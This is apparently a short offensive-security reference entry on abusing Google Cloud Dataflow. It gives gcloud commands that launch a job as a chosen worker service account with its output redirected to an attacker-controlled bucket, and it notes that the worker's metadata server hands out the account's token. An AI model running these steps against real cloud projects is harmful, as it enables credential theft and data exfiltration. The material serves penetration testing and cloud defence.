Dataflow runs managed Apache Beam pipelines on worker VMs that carry a worker service account. Launching a job runs pipeline code on those workers as that account, and the pipeline reads from and writes to the sources and sinks it is configured for (GCS, BigQuery, Pub/Sub), so a job you control reaches both the worker's token and the data in flight.
Launching a pipeline#
gcloud dataflow jobs list --region <region>
# a custom or template job runs as --service-account-email on the workers
gcloud dataflow jobs run <name> --region <region> \
--gcs-location gs://<template> \
--service-account-email <worker-sa> \
--parameters inputFile=gs://<src>,output=gs://<attacker-sink>
Exploitation notes#
dataflow.jobs.createwith a chosen worker service account is the actAs-style deploy path; the worker's metadata server yields the token.- Pipelines frequently move high-value data (event streams, warehouse exports); redirecting the sink to a bucket you control exfiltrates it.
Tools#
- gcloud (
dataflow jobs list/run).